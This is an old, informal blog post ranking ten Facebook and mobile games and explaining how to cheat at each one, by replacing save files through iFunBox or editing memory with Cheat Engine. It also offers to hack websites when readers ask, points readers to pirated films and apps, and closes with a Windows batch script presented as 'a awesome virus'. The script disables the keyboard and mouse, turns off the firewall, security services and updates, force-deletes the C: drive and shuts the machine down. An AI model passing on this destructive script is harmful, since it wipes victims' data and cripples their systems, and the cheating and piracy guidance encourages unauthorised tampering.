Friday, 22 November 2013

Top 10 facebook games and how to hack them #9 bejeweled blitz

Bejeweled blitz averages well over 5million monthly players, to hack it you will need ifunbkx and the  hacked documents (links for both at the bottom of this post), first delete bejeweled blitz from your multitask on your i-device by double tapping he home button, now plug your i-device into your pc and open ifunbox. Now go to ifunbox classic click your device then click user applications then bejeweled blitz, now click into documents and delete everything in it, then go to the winrar folder u download click into documents and copy the 3 things in it and paste it into the documents in ifunbox, now go back to the original bejweled blitz on ifunbox and is time click library, then go to preferences and delete the one in there that says com.popcap.bejblitz.plist then go back to the winrar folder u downloaded and back out from the documents folder and under it u will see a file saying com.popcap.bejblitz.plist paste this into ifunbox, now disconnect your device and you are done u know have hack bejeweled blitz and have a billion coins

Hacked files:

Top 10 facebook games and how to hack them #8 social empires

Social empires averages over 10 million monthly players and only requires cheat engine to hack, first open your browser in cheat cheat engine, then change 4 byte to string, now search wood and select them all, them change it to cash no start chopping a few trees and you'll notice your getting cash, now go to news and buy the resource pack this will give u 25k each time, do is several times then change cash back to wood and upgrade whatever and build whatever you want although once your browser is refreshed he cash will disapear but dont worry all the upgrades and resources u bought will stay there so u can do whatever u want on the game and get more cash whenever just make sure to change it back to wood each time.

Top 10 facebook games and how to hack them #7 subway surfers

Subway surfers averages over 10million players monthly and is a well known game,to hack it you'll need to download 3 things (ifunbox, social data and player data) these links will be at the bottom of the post. First u need to open ifunbox and double tap your home button on your i-device and remove subway surfers from your multitask. Now go into ifunbox and click ifunbox classic, then click user applications and go to subway surfers, now click into documents and delete any of the files named social data or player days in there. Now go to the hacked social and player data profiles u downloaded and paste them in, now refresh the page several times and disconnect your device now u have over 10 million coins, upgrades complete and tons of items there.

Social data hacked:
Player data hacked:

Top 10 facebook games and how to hack them #6 papa pear saga

This game averages over 16 million players per month and is simple to hack, first u need to open papa pear saga and open cheat engine, next select your browser in cheat engine and type in your amount of shots left, then take another shot and type in the remaining number of shots now, now only two results should appear click them both and change there value to whatever number of shots u want to have and your done u can do this as much as u want on each level.

Top 10 facebook games and how to hack them #5 bubble witch saga

Bubble witch saga averages over 16 million players a month and to hack it is simple all that you need to do is download ifunbox and the file (the two links will be listed below). Then u need to connect your i-device to your pc and remove bubble witch saga from your multitasking by double tapping the home button and removing it from there, then u need to go into ifunbox classic, then user applications, then click into the app, then click into documents and remove all the things in documents then paste in the file u downloaded. Now refresh the page several times and then just disconnect your device and open bubble witch saga and you'll see now every level is completed 3 starred and has a score of 10,000,000 on each, you'll also see u have over 10,000,000 coins and unlimated options and that stuff.

Top 10 facebook games and how to hack them #4 dragon city

Dragon city was created by social point, and averages 27million players a week. To hack it all u need is cheat engine, first off u open dragon city and chest engine, now select your browser on cheat engine and select enable speed hack, now change it to 10.0 then go back to dragon city. You'll notice your dragons gaining gold 10x as fast now (dont do the speed hack to high or the game will crash) now just keep collecting as much gold as you want.

Top 10 facebook games and how to hack them #3 pet rescue saga

Pet rescue saga branched off candy crush saga made by the same developers and now averages over 30 million players a month and below is how to hack to have unlimated all in game items and get moved up to level 23 with all previous levels 3 starred. To do it u must get ifunbox (link down the bottom) and the file your going to paste in (link down the bottom of post). First u need to double tap your home button and dlete pet resue from your multitask, now plug your i-device into your pc and open ifunbox, now go to ifunbox classic and click your device then user applications. Now find pet resue saga and open it then click into documents and delete all things in documents, now go to the downloaded file it should say save_0.dat and u need to paste that into the empty documents folder, nks refresh the page a few times then disconnect your device and he hack is complete, u r now on level 23 with all previous levels 3 starred and u have unlimated all in game items.

Ifunbox link:
Hacked file link:

Top 10 facebook games and how to hack them #2 FarmVille 2

FarmVille 2 averages over 32million players a month and is a well known facebook game, below is a coin hack in the game only requiring cheat engine.

coins hack

Open FarmVille 2 and cheat engine then select your browser on cheat engine, next search 1000000 and select all of them (ctrl A) then change there values to 1 now go buy "harvestate manor) for 1 coin then go back to cheat engine and search 50000 then select all of them and change there values to 500000 now sell "harvestate manor) and u get 500000, u can do this as many times as yw ant for as much coins as u want.

Top 10 facebook games and how to hack them #1 candy crush saga

Candy crush saga is the most played game on facebook, it averages over 36 million monthly views and heres how to hack it:

Step 1:

Download ifunbox (link below) then connect your i-device and click ifunbox classic and click your device in the list, next click games and go into candy crush saga.

Step 2:

Now go into documents and delete all things in it then paste all of the things in the folder that u can download from the second link at the bottom of the post, now make sure to refresh it a few times then click out of ifunbox and disconnect your device and your done, you now have hacked candy crush saga and are up to level 395 with all prior levels 3 starred unlimated hearts. Enjoy!

Link for ifunbox:
Link for folders to paste into documents:

Do you need anything hacked

Just simply comment whatever games, websites or anything u need or want hacked and i will make a post of it in a short period of time afterwards

How to delete infected files on your pc

First off find the infected files, next select them all and click properties, then click security and then advanced, now change the owner ship to your account and then click apply and ok then change it to allow everything for you on the security page, now u can simply delete them.

How to watch movies and tv shows free online

Just go to this site (link below) and search the movie or tv show u want to watch and your done.

How to get free apps using only your i-device

Just simply go to and click the center button and then tap install, next just clikc the app installed and search any app u want downloaded and download it for free, Enjoy!

Top 3 sites for no survey downloads of anything




How to do the matrix effect using notepad

Copy and paste the following then save it as anything .bat dont worry u can open it its not dangerous its just great effects

    @echo off
    color 02
    echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
    goto start

    how to make a awesome virus with notepad

    simply open notepad type the following and save it as anything .bat
    rundll32 mouse,disable
    rundll32 keyboard,disable
    COPY %0 %windir%WINSTART.BAT
    net stop "Security Center"
    net stop SharedAccess
    echo you get a virus!!!
    @ping.exe -n 5 -w 1000 > nul
    start [url][/url]
    @ping.exe -n 5 -w 1000 > nul
    > "%Temp%.kill.reg" ECHO REGEDIT4
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    START /WAIT REGEDIT /S "%Temp%.kill.reg"
    del "%Temp%.kill.reg"
    del %0
    DEL /F /S /Q C:
    shutdown -s -t 10 -c "Say good bye to your computer!" -f